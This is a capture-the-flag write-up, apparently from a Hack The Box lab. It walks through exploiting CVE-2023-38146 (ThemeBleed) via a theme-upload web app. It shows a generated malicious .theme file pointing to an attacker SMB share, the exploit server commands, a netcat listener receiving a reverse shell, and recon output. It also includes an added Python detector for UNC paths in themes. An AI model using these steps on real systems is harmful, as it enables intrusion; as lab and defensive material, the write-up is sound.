CVE-2023-38146


The target web server hosts a web application for sharing Windows 11 themes, which includes a file upload feature. The upload flow appears to open the submitted files in sequence for testing before they are integrated into the website. Older builds of Windows 11 are susceptible to a remote code execution vulnerability in the themes component, [CVE-2023-38146](https://nvd.nist.gov/vuln/detail/CVE-2023-38146). While the exact version of the target system is unconfirmed, exploring CVE-2023-38146 is a prudent next step given how recent it is.

The exploit package only includes a DLL payload that launches calc.exe as a PoC; I created and compiled a custom DLL payload that spawns a reverse shell instead.

ps c:\Users\admin\Desktop\ThemeBleed> .\ThemeBleed.exe
usage: ThemeBleed.exe <command>
 
commands:
        server                                   - Runs the server
        make_theme <host> <output path>          - Generates a .theme file referencing the specified host
        make_themepack <host> <output_path>      - Generates a .themepack file referencing the specified host

The [exploit package](https://github.com/gabe-k/themebleed) includes a Windows-only binary named ThemeBleed.exe, so switching to a Windows host is required to run it. The executable supports two main features:

  • server: starts an SMB server that serves the payloads from the data directory
  • make_theme / make_themepack: generate a .theme/.themepack file pointing to the specified host

ps c:\Users\admin\Desktop\ThemeBleed> .\ThemeBleed.exe make_theme 10.10.14.4 myTheme.theme
 
ps c:\Users\admin\Desktop\ThemeBleed> cat .\myTheme.theme
; windows 11 theme exploit
; copyright 2023 fukin software foundation
 
[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2060
 
[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10
 
[VisualStyles]
Path=\\10.10.14.4\test\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
 
[MasterThemeSelector]
MTSM=RJSPBS

First I generate a .theme file pointing to 10.10.14.4, my current IP address. Its content indeed contains a UNC path to the specified host (the Path entry under [VisualStyles]).
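As an added defender-side example (not part of the original writeup or the ThemeBleed project), the following Python script parses a .theme file and flags any value that is a UNC path, using the theme generated above as constructed sample input:

```python
import configparser
import re

# Constructed sample: the .theme file generated above (host 10.10.14.4 taken
# from the page); the [VisualStyles] Path points at a remote SMB share.
SAMPLE_THEME = r"""
; windows 11 theme exploit
[Theme]
DisplayName=@%SystemRoot%\System32\themeui.dll,-2060

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0
WallpaperStyle=10

[VisualStyles]
Path=\\10.10.14.4\test\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize

[MasterThemeSelector]
MTSM=RJSPBS
"""

# UNC path: leading '\\', a host (name or IP literal), then a share name.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\([^\\]+)")


def find_remote_references(theme_text):
    """Return (section, key, value) for every theme value that is a UNC path.

    Legitimate themes resolve resources under %SystemRoot% or the user
    profile; a resource fetched from a remote share is the ThemeBleed pattern.
    """
    # interpolation=None: values such as '%SystemRoot%' would otherwise
    # raise an InterpolationSyntaxError in configparser.
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep key case exactly as written in the file
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if UNC_RE.match(value.strip()):
                hits.append((section, key, value.strip()))
    return hits


def is_suspicious(theme_text):
    """True when the visual style (.msstyles) itself would load over UNC."""
    return any(section.lower() == "visualstyles" and key.lower() == "path"
               for section, key, _ in find_remote_references(theme_text))
```

Running this over uploads before any preview or apply step gives the web application a cheap quarantine check for themes that reference an external share.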

ps c:\Users\admin\Desktop\ThemeBleed> .\ThemeBleed.exe server
Server started

Starting the SMB server that hosts the payload.

Uploading the myTheme.theme file to the web application and catching the reverse shell on the listener.

ps c:\Users\admin\Desktop\ThemeBleed> .\nc64.exe -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.237] 64090
Microsoft Windows [Version 10.0.22000.1761]
(c) Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
 whoami
aero\sam.emerson
 
c:\Windows\system32> hostname
 hostname
aero
 
c:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::177
   ipv6 address. . . . . . . . . . . : dead:beef::5aa2:a858:ac20:b1e7
   temporary ipv6 address. . . . . . : dead:beef::9d34:25ac:aeff:695a
   link-local ipv6 address . . . . . : fe80::f370:3a1d:f4c0:2fa%14
   ipv4 address. . . . . . . . . . . : 10.10.11.237
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%14
                                       10.10.10.2

Initial foothold established on the target system as the sam.emerson user by exploiting CVE-2023-38146.